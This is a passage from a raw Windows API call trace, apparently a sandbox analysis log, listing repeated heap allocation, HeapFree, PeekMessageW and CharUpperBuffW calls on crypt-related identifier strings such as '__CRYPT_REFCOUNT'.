(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0215.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0215.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0215.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0215.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0215.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0215.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0215.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0215.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0215.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0215.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0215.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0215.828] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0215.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0215.829] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0215.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0215.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0215.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0215.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0215.829] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0215.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0215.829] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0215.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0215.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0215.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0215.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0215.829] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0215.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0215.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0215.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0215.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0215.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0215.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0215.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0215.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0215.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0215.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0215.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0215.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0215.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0215.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0215.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0215.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0215.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0215.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0215.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0215.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0215.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0215.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0215.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0215.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0215.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0215.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0215.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0215.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0215.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0215.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0215.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0215.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0215.831] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0215.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0215.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0215.831] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0215.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0215.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0215.831] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0215.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0215.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0215.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0215.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0215.831] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0215.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0215.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0215.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0215.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0215.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0215.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0215.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0215.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0215.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0215.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0215.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0215.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0215.832] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0215.832] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0215.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0215.832] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0215.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0215.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0215.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0215.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0215.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0215.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0215.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0215.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0215.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0215.832] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0215.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0215.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0215.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0215.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0215.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0215.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0215.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0215.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0215.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0215.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0215.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0215.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0215.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0215.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0215.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0215.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0215.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0215.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0215.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0215.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0215.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0215.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0215.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0215.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0215.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0215.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0215.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0215.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0215.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0215.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0215.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0215.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0215.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0215.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0215.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0215.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0215.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0215.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0215.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0215.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0215.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0215.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0215.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0215.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0215.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0215.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0215.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0215.834] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0215.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0215.835] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0215.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0215.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0215.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0215.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0215.835] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0215.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0215.835] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0215.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0215.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0215.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0215.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0215.835] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0215.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0215.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0215.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0215.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0215.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0215.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0215.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0215.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0215.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0215.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0215.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0215.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0215.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0215.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0215.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0215.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0215.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0215.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0215.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0215.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0215.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0215.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0215.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0215.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0215.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0215.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0215.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0215.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0215.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0215.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0215.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0215.837] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0215.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0215.910] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0215.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0215.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0215.910] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0215.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0215.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0215.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0215.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0215.910] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0215.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0215.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0215.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0215.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0215.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0215.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0215.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0215.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0215.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0215.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0215.911] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0215.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0215.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0215.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0215.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0215.911] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0215.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0215.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 